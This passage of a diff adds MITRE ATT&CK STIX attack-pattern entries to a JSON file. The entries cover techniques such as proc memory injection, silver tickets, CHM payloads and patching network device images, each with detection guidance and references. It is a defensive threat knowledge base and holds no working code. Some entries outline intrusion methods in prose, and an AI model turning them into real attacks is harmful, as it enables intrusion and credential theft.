"identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1543/001", + "external_id": "T1543.001" + }, + { + "source_name": "AppleDocs Launch Agent Daemons", + "description": "Apple. (n.d.). Creating Launch Daemons and Agents. Retrieved July 10, 2017.", + "url": "https://developer.apple.com/library/content/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/CreatingLaunchdJobs.html" + }, + { + "source_name": "Sofacy Komplex Trojan", + "description": "Dani Creus, Tyler Halfpop, Robert Falcone. (2016, September 26). Sofacy's 'Komplex' OS X Trojan. Retrieved July 8, 2017.", + "url": "https://researchcenter.paloaltonetworks.com/2016/09/unit42-sofacys-komplex-os-x-trojan/" + }, + { + "source_name": "OceanLotus for OS X", + "description": "Eddie Lee. (2016, February 17). OceanLotus for OS X - an Application Bundle Pretending to be an Adobe Flash Update. Retrieved July 5, 2017.", + "url": "https://www.alienvault.com/blogs/labs-research/oceanlotus-for-os-x-an-application-bundle-pretending-to-be-an-adobe-flash-update" + }, + { + "source_name": "OSX Keydnap malware", + "description": "Marc-Etienne M.Leveille. (2016, July 6). New OSX/Keydnap malware is hungry for credentials. Retrieved July 3, 2017.", + "url": "https://www.welivesecurity.com/2016/07/06/new-osxkeydnap-malware-hungry-credentials/" + }, + { + "source_name": "Methods of Mac Malware Persistence", + "description": "Patrick Wardle. (2014, September). Methods of Malware Persistence on Mac OS X. Retrieved July 5, 2017.", + "url": "https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdf" + }, + { + "source_name": "OSX Malware Detection", + "description": "Patrick Wardle. (2016, February 29). Let's Play Doctor: Practical OS X Malware Detection & Analysis. Retrieved July 10, 2017.", + "url": "https://www.synack.com/wp-content/uploads/2016/03/RSA_OSX_Malware.pdf" + }, + { + "source_name": "Antiquated Mac Malware", + "description": "Thomas Reed. (2017, January 18). New Mac backdoor using antiquated code. Retrieved July 5, 2017.", + "url": "https://blog.malwarebytes.com/threat-analysis/2017/01/new-mac-backdoor-using-antiquated-code/" + }, + { + "source_name": "OSX.Dok Malware", + "description": "Thomas Reed. (2017, July 7). New OSX.Dok malware intercepts web traffic. Retrieved July 10, 2017.", + "url": "https://blog.malwarebytes.com/threat-analysis/2017/04/new-osx-dok-malware-intercepts-web-traffic/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2022-05-11T14:00:00.188Z", + "name": "System Services", + "description": "Adversaries may abuse system services or daemons to execute commands or programs. Adversaries can execute malicious content by interacting with or creating services either locally or remotely. Many services are set to run at boot, which can aid in achieving persistence ([Create or Modify System Process](https://attack.mitre.org/techniques/T1543)), but adversaries can also abuse services for one-time or temporary execution.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "execution" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [], + "x_mitre_detection": "Monitor for command line invocations of tools capable of modifying services that doesn’t correspond to normal usage patterns and known software, patch cycles, etc. Also monitor for changes to executables and other files associated with services. Changes to Windows services may also be reflected in the Registry.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows", + "macOS", + "Linux" + ], + "x_mitre_version": "1.2", + "x_mitre_data_sources": [], + "x_mitre_permissions_required": [ + "User", + "Administrator", + "SYSTEM", + "root" + ], + "x_mitre_remote_support": true, + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--d157f9d2-d09a-4efa-bb2a-64963f94e253", + "created": "2020-03-10T18:23:06.482Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1569", + "external_id": "T1569" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2024-03-01T17:35:02.889Z", + "name": "Windows Command Shell", + "description": "Adversaries may abuse the Windows command shell for execution. The Windows command shell ([cmd](https://attack.mitre.org/software/S0106)) is the primary command prompt on Windows systems. The Windows command prompt can be used to control almost any aspect of a system, with various permission levels required for different subsets of commands. The command prompt can be invoked remotely via [Remote Services](https://attack.mitre.org/techniques/T1021) such as [SSH](https://attack.mitre.org/techniques/T1021/004).(Citation: SSH in Windows)\n\nBatch files (ex: .bat or .cmd) also provide the shell with a list of sequential commands to run, as well as normal scripting operations such as conditionals and loops. Common uses of batch files include long or repetitive tasks, or the need to run the same set of commands on multiple systems.\n\nAdversaries may leverage [cmd](https://attack.mitre.org/software/S0106) to execute various commands and payloads. Common uses include [cmd](https://attack.mitre.org/software/S0106) to execute a single command, or abusing [cmd](https://attack.mitre.org/software/S0106) interactively with input and output forwarded over a command and control channel.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "execution" + } + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [], + "x_mitre_deprecated": false, + "x_mitre_detection": "Usage of the Windows command shell may be common on administrator, developer, or power user systems depending on job function. If scripting is restricted for normal users, then any attempt to enable scripts running on a system would be considered suspicious. If scripts are not commonly used on a system, but enabled, scripts running out of cycle from patching or other administrator functions are suspicious. Scripts should be captured from the file system when possible to determine their actions and intent.\n\nScripts are likely to perform actions with various effects on a system that may generate events, depending on the types of monitoring used. Monitor processes and command-line arguments for script execution and subsequent behavior. Actions may be related to network and system information Discovery, Collection, or other scriptable post-compromise behaviors and could be used as indicators of detection leading back to the source script.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.4", + "x_mitre_data_sources": [], + "x_mitre_remote_support": true, + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--d1fcf083-a721-4223-aedf-bf8960798d62", + "created": "2020-03-09T14:12:31.196Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1059/003", + "external_id": "T1059.003" + }, + { + "source_name": "SSH in Windows", + "description": "Microsoft. (2020, May 19). Tutorial: SSH in Windows Terminal. Retrieved July 26, 2021.", + "url": "https://docs.microsoft.com/en-us/windows/terminal/tutorials/ssh" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2021-04-29T14:49:39.188Z", + "name": "Proc Memory", + "description": "Adversaries may inject malicious code into processes via the /proc filesystem in order to evade process-based defenses as well as possibly elevate privileges. Proc memory injection is a method of executing arbitrary code in the address space of a separate live process. \n\nProc memory injection involves enumerating the memory of a process via the /proc filesystem (/proc/[pid]) then crafting a return-oriented programming (ROP) payload with available gadgets/instructions. Each running process has its own directory, which includes memory mappings. Proc memory injection is commonly performed by overwriting the target processes’ stack using memory mappings provided by the /proc filesystem. This information can be used to enumerate offsets (including the stack) and gadgets (or instructions within the program that can be used to build a malicious payload) otherwise hidden by process memory protections such as address space layout randomization (ASLR). Once enumerated, the target processes’ memory map within /proc/[pid]/maps can be overwritten using dd.(Citation: Uninformed Needle)(Citation: GDS Linux Injection)(Citation: DD Man) \n\nOther techniques such as [Dynamic Linker Hijacking](https://attack.mitre.org/techniques/T1574/006) may be used to populate a target process with more available gadgets. Similar to [Process Hollowing](https://attack.mitre.org/techniques/T1055/012), proc memory injection may target child processes (such as a backgrounded copy of sleep).(Citation: GDS Linux Injection) \n\nRunning code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via proc memory injection may also evade detection from security products since the execution is masked under a legitimate process. ", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "defense-evasion" + }, + { + "kill_chain_name": "mitre-attack", + "phase_name": "privilege-escalation" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [], + "x_mitre_detection": "File system monitoring can determine if /proc files are being modified. Users should not have permission to modify these in most cases. \n\nAnalyze process behavior to determine if a process is performing actions it usually does not, such as opening network connections, reading files, or other suspicious actions that could relate to post-compromise behavior. ", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Linux" + ], + "x_mitre_version": "1.0", + "x_mitre_data_sources": [], + "x_mitre_defense_bypassed": [ + "Application control", + "Anti-virus" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--d201d4cc-214d-4a74-a1ba-b3fa09fd4591", + "created": "2020-01-14T01:34:10.588Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1055/009", + "external_id": "T1055.009" + }, + { + "source_name": "Uninformed Needle", + "description": "skape. (2003, January 19). Linux x86 run-time process manipulation. Retrieved December 20, 2017.", + "url": "http://hick.org/code/skape/papers/needle.txt" + }, + { + "source_name": "GDS Linux Injection", + "description": "McNamara, R. (2017, September 5). Linux Based Inter-Process Code Injection Without Ptrace(2). Retrieved February 21, 2020.", + "url": "https://blog.gdssecurity.com/labs/2017/9/5/linux-based-inter-process-code-injection-without-ptrace2.html" + }, + { + "source_name": "DD Man", + "description": "Kerrisk, M. (2020, February 2). DD(1) User Commands. Retrieved February 21, 2020.", + "url": "http://man7.org/linux/man-pages/man1/dd.1.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2022-04-25T14:00:00.188Z", + "name": "Compiled HTML File", + "description": "Compiled HTML files (.chm) are commonly distributed as part of the Microsoft HTML Help system. CHM files are compressed compilations of various content such as HTML documents, images, and scripting/web related programming languages such VBA, JScript, Java, and ActiveX. (Citation: Microsoft HTML Help May 2018) CHM content is displayed using underlying components of the Internet Explorer browser (Citation: Microsoft HTML Help ActiveX) loaded by the HTML Help executable program (hh.exe). (Citation: Microsoft HTML Help Executable Program)\n\nAdversaries may abuse this technology to conceal malicious code. A custom CHM file containing embedded payloads could be delivered to a victim then triggered by [User Execution](https://attack.mitre.org/techniques/T1204). CHM execution may also bypass application whitelisting on older and/or unpatched systems that do not account for execution of binaries through hh.exe. (Citation: MsitPros CHM Aug 2017) (Citation: Microsoft CVE-2017-8625 Aug 2017)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "defense-evasion" + }, + { + "kill_chain_name": "mitre-attack", + "phase_name": "execution" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [ + "Rahmat Nurfauzi, @infosecn1nja, PT Xynexis International" + ], + "x_mitre_detection": "Monitor and analyze the execution and arguments of hh.exe. (Citation: MsitPros CHM Aug 2017) Compare recent invocations of hh.exe with prior history of known good arguments to determine anomalous and potentially adversarial activity (ex: obfuscated and/or malicious commands). Non-standard process execution trees may also indicate suspicious or malicious behavior, such as if hh.exe is the parent process for suspicious processes and activity relating to other adversarial techniques.\n\nMonitor presence and use of CHM files, especially if they are not typically used within an environment.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.1", + "x_mitre_data_sources": [], + "x_mitre_defense_bypassed": [ + "Application whitelisting", + "Digital Certificate Validation" + ], + "x_mitre_permissions_required": [ + "User" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--d21a2069-23d5-4043-ad6d-64f6b644cb1a", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": true, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1223", + "external_id": "T1223" + }, + { + "source_name": "Microsoft HTML Help May 2018", + "description": "Microsoft. (2018, May 30). Microsoft HTML Help 1.4. Retrieved October 3, 2018.", + "url": "https://docs.microsoft.com/previous-versions/windows/desktop/htmlhelp/microsoft-html-help-1-4-sdk" + }, + { + "source_name": "Microsoft HTML Help ActiveX", + "description": "Microsoft. (n.d.). HTML Help ActiveX Control Overview. Retrieved October 3, 2018.", + "url": "https://msdn.microsoft.com/windows/desktop/ms644670" + }, + { + "source_name": "Microsoft HTML Help Executable Program", + "description": "Microsoft. (n.d.). About the HTML Help Executable Program. Retrieved October 3, 2018.", + "url": "https://msdn.microsoft.com/windows/desktop/ms524405" + }, + { + "source_name": "MsitPros CHM Aug 2017", + "description": "Moe, O. (2017, August 13). Bypassing Device guard UMCI using CHM – CVE-2017-8625. Retrieved October 3, 2018.", + "url": "https://msitpros.com/?p=3909" + }, + { + "source_name": "Microsoft CVE-2017-8625 Aug 2017", + "description": "Microsoft. (2017, August 8). CVE-2017-8625 - Internet Explorer Security Feature Bypass Vulnerability. Retrieved October 3, 2018.", + "url": "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8625" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-04-14T20:04:42.893Z", + "name": "Acquire Access", + "description": "Adversaries may purchase or otherwise acquire an existing access to a target system or network. A variety of online services and initial access broker networks are available to sell access to previously compromised systems.(Citation: Microsoft Ransomware as a Service)(Citation: CrowdStrike Access Brokers)(Citation: Krebs Access Brokers Fortune 500) In some cases, adversary groups may form partnerships to share compromised systems with each other.(Citation: CISA Karakurt 2022)\n\nFootholds to compromised systems may take a variety of forms, such as access to planted backdoors (e.g., [Web Shell](https://attack.mitre.org/techniques/T1505/003)) or established access via [External Remote Services](https://attack.mitre.org/techniques/T1133). In some cases, access brokers will implant compromised systems with a “load” that can be used to install additional malware for paying customers.(Citation: Microsoft Ransomware as a Service)\n\nBy leveraging existing access broker networks rather than developing or obtaining their own initial access capabilities, an adversary can potentially reduce the resources required to gain a foothold on a target network and focus their efforts on later stages of compromise. Adversaries may prioritize acquiring access to systems that have been determined to lack security monitoring or that have high privileges, or systems that belong to organizations in a particular sector.(Citation: Microsoft Ransomware as a Service)(Citation: CrowdStrike Access Brokers)\n\nIn some cases, purchasing access to an organization in sectors such as IT contracting, software development, or telecommunications may allow an adversary to compromise additional victims via a [Trusted Relationship](https://attack.mitre.org/techniques/T1199), [Multi-Factor Authentication Interception](https://attack.mitre.org/techniques/T1111), or even [Supply Chain Compromise](https://attack.mitre.org/techniques/T1195).\n\n**Note:** while this technique is distinct from other behaviors such as [Purchase Technical Data](https://attack.mitre.org/techniques/T1597/002) and [Credentials](https://attack.mitre.org/techniques/T1589/001), they may often be used in conjunction (especially where the acquired foothold requires [Valid Accounts](https://attack.mitre.org/techniques/T1078)).", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "resource-development" + } + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_contributors": [ + "Jeremy Kennelly", + "Jeffrey Barto" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Much of this takes place outside the visibility of the target organization, making detection difficult for defenders. \n\nDetection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access. ", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "PRE" + ], + "x_mitre_version": "1.0", + "x_mitre_data_sources": [], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--d21bb61f-08ad-4dc1-b001-81ca6cb79954", + "created": "2023-03-10T15:37:21.782Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1650", + "external_id": "T1650" + }, + { + "source_name": "Krebs Access Brokers Fortune 500", + "description": "Brian Krebs. (2012, October 22). Service Sells Access to Fortune 500 Firms. Retrieved March 10, 2023.", + "url": "https://krebsonsecurity.com/2012/10/service-sells-access-to-fortune-500-firms/" + }, + { + "source_name": "CrowdStrike Access Brokers", + "description": "CrowdStrike Intelligence Team. (2022, February 23). Access Brokers: Who Are the Targets, and What Are They Worth?. Retrieved March 10, 2023.", + "url": "https://www.crowdstrike.com/blog/access-brokers-targets-and-worth/" + }, + { + "source_name": "CISA Karakurt 2022", + "description": "Cybersecurity Infrastructure and Defense Agency. (2022, June 2). Karakurt Data Extortion Group. Retrieved March 10, 2023.", + "url": "https://www.cisa.gov/news-events/cybersecurity-advisories/aa22-152a" + }, + { + "source_name": "Microsoft Ransomware as a Service", + "description": "Microsoft. (2022, May 9). Ransomware as a service: Understanding the cybercrime gig economy and how to protect yourself. Retrieved March 10, 2023.", + "url": "https://www.microsoft.com/en-us/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2021-04-29T14:49:39.188Z", + "name": "Patch System Image", + "description": "Adversaries may modify the operating system of a network device to introduce new capabilities or weaken existing defenses.(Citation: Killing the myth of Cisco IOS rootkits) (Citation: Killing IOS diversity myth) (Citation: Cisco IOS Shellcode) (Citation: Cisco IOS Forensics Developments) (Citation: Juniper Netscreen of the Dead) Some network devices are built with a monolithic architecture, where the entire operating system and most of the functionality of the device is contained within a single file. Adversaries may change this file in storage, to be loaded in a future boot, or in memory during runtime.\n\nTo change the operating system in storage, the adversary will typically use the standard procedures available to device operators. This may involve downloading a new file via typical protocols used on network devices, such as TFTP, FTP, SCP, or a console connection. The original file may be overwritten, or a new file may be written alongside of it and the device reconfigured to boot to the compromised image.\n\nTo change the operating system in memory, the adversary typically can use one of two methods. In the first, the adversary would make use of native debug commands in the original, unaltered running operating system that allow them to directly modify the relevant memory addresses containing the running operating system. This method typically requires administrative level access to the device.\n\nIn the second method for changing the operating system in memory, the adversary would make use of the boot loader. The boot loader is the first piece of software that loads when the device starts that, in turn, will launch the operating system. Adversaries may use malicious code previously implanted in the boot loader, such as through the [ROMMONkit](https://attack.mitre.org/techniques/T1542/004) method, to directly manipulate running operating system code in memory. This malicious code in the bootloader provides the capability of direct memory manipulation to the adversary, allowing them to patch the live operating system during runtime.\n\nBy modifying the instructions stored in the system image file, adversaries may either weaken existing defenses or provision new capabilities that the device did not have before. Examples of existing defenses that can be impeded include encryption, via [Weaken Encryption](https://attack.mitre.org/techniques/T1600), authentication, via [Network Device Authentication](https://attack.mitre.org/techniques/T1556/004), and perimeter defenses, via [Network Boundary Bridging](https://attack.mitre.org/techniques/T1599). Adding new capabilities for the adversary’s purpose include [Keylogging](https://attack.mitre.org/techniques/T1056/001), [Multi-hop Proxy](https://attack.mitre.org/techniques/T1090/003), and [Port Knocking](https://attack.mitre.org/techniques/T1205/001).\n\nAdversaries may also compromise existing commands in the operating system to produce false output to mislead defenders. When this method is used in conjunction with [Downgrade System Image](https://attack.mitre.org/techniques/T1601/002), one example of a compromised system command may include changing the output of the command that shows the version of the currently running operating system. By patching the operating system, the adversary can change this command to instead display the original, higher revision number that they replaced through the system downgrade. \n\nWhen the operating system is patched in storage, this can be achieved in either the resident storage (typically a form of flash memory, which is non-volatile) or via [TFTP Boot](https://attack.mitre.org/techniques/T1542/005). \n\nWhen the technique is performed on the running operating system in memory and not on the stored copy, this technique will not survive across reboots. However, live memory modification of the operating system can be combined with [ROMMONkit](https://attack.mitre.org/techniques/T1542/004) to achieve persistence. ", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "defense-evasion" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [], + "x_mitre_detection": "Compare the checksum of the operating system file with the checksum of a known good copy from a trusted source. Some embedded network device platforms may have the capability to calculate the checksum of the file, while others may not. Even for those platforms that have the capability, it is recommended to download a copy of the file to a trusted computer to calculate the checksum with software that is not compromised.(Citation: Cisco IOS Software Integrity Assurance - Image File Verification)\n\nMany vendors of embedded network devices can provide advanced debugging support that will allow them to work with device owners to validate the integrity of the operating system running in memory. If a compromise of the operating system is suspected, contact the vendor technical support and seek such services for a more thorough inspection of the current running system. (Citation: Cisco IOS Software Integrity Assurance - Run-Time Memory Verification)", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Network" + ], + "x_mitre_version": "1.0", + "x_mitre_data_sources": [], + "x_mitre_permissions_required": [ + "Administrator" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--d245808a-7086-4310-984a-a84aaaa43f8f", + "created": "2020-10-19T19:49:24.129Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1601/001", + "external_id": "T1601.001" + }, + { + "source_name": "Killing the myth of Cisco IOS rootkits", + "description": "Sebastian 'topo' Muñiz. (2008, May). Killing the myth of Cisco IOS rootkits. Retrieved October 20, 2020.", + "url": "https://drwho.virtadpt.net/images/killing_the_myth_of_cisco_ios_rootkits.pdf" + }, + { + "source_name": "Killing IOS diversity myth", + "description": "Ang Cui, Jatin Kataria, Salvatore J. Stolfo. (2011, August). Killing the myth of Cisco IOS diversity: recent advances in reliable shellcode design. Retrieved October 20, 2020.", + "url": "https://www.usenix.org/legacy/event/woot/tech/final_files/Cui.pdf" + }, + { + "source_name": "Cisco IOS Shellcode", + "description": "George Nosenko. (2015). CISCO IOS SHELLCODE: ALL-IN-ONE. Retrieved October 21, 2020.", + "url": "http://2015.zeronights.org/assets/files/05-Nosenko.pdf" + }, + { + "source_name": "Cisco IOS Forensics Developments", + "description": "Felix 'FX' Lindner. (2008, February). Developments in Cisco IOS Forensics. Retrieved October 21, 2020.", + "url": "https://www.recurity-labs.com/research/RecurityLabs_Developments_in_IOS_Forensics.pdf" + }, + { + "source_name": "Juniper Netscreen of the Dead", + "description": "Graeme Neilson . (2009, August). Juniper Netscreen of the Dead. Retrieved October 20, 2020.", + "url": "https://www.blackhat.com/presentations/bh-usa-09/NEILSON/BHUSA09-Neilson-NetscreenDead-SLIDES.pdf" + }, + { + "source_name": "Cisco IOS Software Integrity Assurance - Image File Verification", + "description": "Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Cisco IOS Image File Verification. Retrieved October 19, 2020.", + "url": "https://tools.cisco.com/security/center/resources/integrity_assurance.html#7" + }, + { + "source_name": "Cisco IOS Software Integrity Assurance - Run-Time Memory Verification", + "description": "Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Cisco IOS Run-Time Memory Integrity Verification. Retrieved October 19, 2020.", + "url": "https://tools.cisco.com/security/center/resources/integrity_assurance.html#13" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2021-04-29T14:49:39.188Z", + "name": "Silver Ticket", + "description": "Adversaries who have the password hash of a target service account (e.g. SharePoint, MSSQL) may forge Kerberos ticket granting service (TGS) tickets, also known as silver tickets. Kerberos TGS tickets are also known as service tickets.(Citation: ADSecurity Silver Tickets)\n\nSilver tickets are more limited in scope in than golden tickets in that they only enable adversaries to access a particular resource (e.g. MSSQL) and the system that hosts the resource; however, unlike golden tickets, adversaries with the ability to forge silver tickets are able to create TGS tickets without interacting with the Key Distribution Center (KDC), potentially making detection more difficult.(Citation: ADSecurity Detecting Forged Tickets)\n\nPassword hashes for target services may be obtained using [OS Credential Dumping](https://attack.mitre.org/techniques/T1003) or [Kerberoasting](https://attack.mitre.org/techniques/T1558/003).", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "credential-access" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [], + "x_mitre_detection": "Monitor for anomalous Kerberos activity, such as malformed or blank fields in Windows logon/logoff events (Event ID 4624, 4634, 4672).(Citation: ADSecurity Detecting Forged Tickets) \n\nMonitor for unexpected processes interacting with lsass.exe.(Citation: Medium Detecting Attempts to Steal Passwords from Memory) Common credential dumpers such as Mimikatz access the LSA Subsystem Service (LSASS) process by opening the process, locating the LSA secrets key, and decrypting the sections in memory where credential details, including Kerberos tickets, are stored.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.0", + "x_mitre_data_sources": [], + "x_mitre_permissions_required": [ + "User" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--d273434a-448e-4598-8e14-607f4a0d5e27", + "created": "2020-02-11T19:14:48.309Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1558/002", + "external_id": "T1558.002" + }, + { + "source_name": "ADSecurity Silver Tickets", + "description": "Sean Metcalf. (2015, November 17). How Attackers Use Kerberos Silver Tickets to Exploit Systems. Retrieved February 27, 2020.", + "url": "https://adsecurity.org/?p=2011" + }, + { + "source_name": "ADSecurity Detecting Forged Tickets", + "description": "Metcalf, S. (2015, May 03). Detecting Forged Kerberos Ticket (Golden Ticket & Silver Ticket) Use in Active Directory. Retrieved December 23, 2015.", + "url": "https://adsecurity.org/?p=1515" + }, + { + "source_name": "Medium Detecting Attempts to Steal Passwords from Memory", + "description": "French, D. (2018, October 2). Detecting Attempts to Steal Passwords from Memory. Retrieved October 11, 2019.", + "url": "https://medium.com/threatpunter/detecting-attempts-to-steal-passwords-from-memory-558f16dce4ea" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2024-03-01T16:27:47.391Z", + "name": "Data from Information Repositories", + "description": "Adversaries may leverage information repositories to mine valuable information. Information repositories are tools that allow for storage of information, typically to facilitate collaboration or information sharing between users, and can store a wide variety of data that may aid adversaries in further objectives, or direct access to the target information. Adversaries may also abuse external sharing features to share sensitive documents with recipients outside of the organization. \n\nThe following is a brief list of example information that may hold potential value to an adversary and may also be found on an information repository:\n\n* Policies, procedures, and standards\n* Physical / logical network diagrams\n* System architecture diagrams\n* Technical system documentation\n* Testing / development credentials\n* Work / project schedules\n* Source code snippets\n* Links to network shares and other internal resources\n\nInformation stored in a repository may vary based on the specific instance or environment. Specific common information repositories include web-based platforms such as [Sharepoint](https://attack.mitre.org/techniques/T1213/002) and [Confluence](https://attack.mitre.org/techniques/T1213/001), specific services such as Code Repositories, IaaS databases, enterprise databases, and other storage infrastructure such as SQL Server.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "collection" + } + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "Naveen Vijayaraghavan, Nilesh Dherange (Gurucul)", + "Regina Elwell", + "Praetorian", + "Milos Stojadinovic", + "Isif Ibrahima, Mandiant" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "As information repositories generally have a considerably large user base, detection of malicious use can be non-trivial. At minimum, access to information repositories performed by privileged users (for example, Active Directory Domain, Enterprise, or Schema Administrators) should be closely monitored and alerted upon, as these types of accounts should generally not be used to access information repositories. If the capability exists, it may be of value to monitor and alert on users that are retrieving and viewing a large number of documents and pages; this behavior may be indicative of programmatic means being used to retrieve all data within the repository. In environments with high-maturity, it may be possible to leverage User-Behavioral Analytics (UBA) platforms to detect and alert on user based anomalies.\n\nThe user access logging within Microsoft's SharePoint can be configured to report access to certain pages and documents. (Citation: Microsoft SharePoint Logging) Sharepoint audit logging can also be configured to report when a user shares a resource. (Citation: Sharepoint Sharing Events) The user access logging within Atlassian's Confluence can also be configured to report access to certain pages and documents through AccessLogFilter. (Citation: Atlassian Confluence Logging) Additional log storage and analysis infrastructure will likely be required for more robust detection capabilities. ", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Linux", + "Windows", + "macOS", + "SaaS", + "Office 365", + "Google Workspace", + "IaaS" + ], + "x_mitre_version": "3.3", + "x_mitre_data_sources": [], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--d28ef391-8ed4-45dc-bc4a-2f43abf54416", + "created": "2018-04-18T17:59:24.739Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1213", + "external_id": "T1213" + }, + { + "source_name": "Atlassian Confluence Logging", + "description": "Atlassian. (2018, January 9). How to Enable User Access Logging. Retrieved April 4, 2018.", + "url": "https://confluence.atlassian.com/confkb/how-to-enable-user-access-logging-182943.html" + }, + { + "source_name": "Microsoft SharePoint Logging", + "description": "Microsoft. (2017, July 19). Configure audit 